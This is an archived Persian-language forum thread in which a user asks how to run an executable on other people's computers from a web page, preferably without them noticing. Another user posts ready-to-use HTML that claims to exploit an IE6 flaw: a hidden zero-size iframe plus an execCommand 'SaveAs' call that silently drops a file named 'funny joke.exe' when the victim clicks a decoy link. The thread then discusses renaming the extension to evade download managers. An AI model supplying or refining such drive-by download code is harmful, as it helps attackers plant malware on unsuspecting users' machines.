PDA

نسخه کامل مشاهده نسخه کامل : اسکریپتی برای اجرای آنلاین یک فایل اجرایی

Benygh
21-10-2008, 19:10
سلام
من یک اسکریپ و یا یک کدی میخوام که بشه باهاش یک فایل اجرایی مانند Exe رو به صورت انلاین اجرا کرد ...
ممنون میشم کمک کنید

Bill Gates
21-10-2008, 19:44
سلام
فکر نکنم باشه
یعنی یه جورایی مطمئنم چون اینطوری که واسه ورود به یه سایت باید با بسم الله بسم الله میرفتیم توش :31::31:

تشکر//

Benygh
21-10-2008, 21:41
سلام
منظورم این نیست که یک دفعه اجرا کنه ... یک جورایی شبیه ActiveX که اینو یکی به من گفت میشه ...
البته نمیدونم چطور ولی یک جورایی باشه که راحت بتونم اجرا کنم رو سیستم افراد ...

sima_6600
21-10-2008, 21:50
بله میشه این کاررو انجام داد البته این یک باگ در IE6 هست و فقت روی این ورژن کار میده
<html>
<body>
<iframe src='[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execC ommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>
اول فیلت رو روی یک سایت اپلود کن بعد ادرش رو به جای اون قرمزه بزار این رو داخل یک NOtpad بریز و با پسوند HTml ذخیره کن.

Benygh
22-10-2008, 18:54
سلام
ممنون ... ولی من Ie 6 ندارم که تست کنم ...

الان من به جای اون قرمز لینکم رو گذاشتم که وقتی اون Html رو هم آپلود کردم یک صحفه ی دانلود میاره !

راهی نداره مخفی انجام بشه ؟

sima_6600
22-10-2008, 20:59
در IE6 درسته ولی در IE7 کار نمیکنه باید سیستم طرف IE6 داشته باشه تا با کیلیک کردن روی گزینه Click.اون اتماتیک دانلود میشه و هیچ پیغامی نمیشه.

Benygh
22-10-2008, 21:20
توی FF وقتی این لینک باز میشه خودش شروع به دانلود میکنه یعنی میاد و میپرسه که دانلود کنه یا نه !
البته باید در نظر گرفت که Download manager ها خودشون چون EXE رو میشناسن دانلود میکنن و باید با یک پسوند دیگه امتحان کرد !
فقط یک چیزی آیا این اجرا هم میشه ؟
کجا دانلود میشه ؟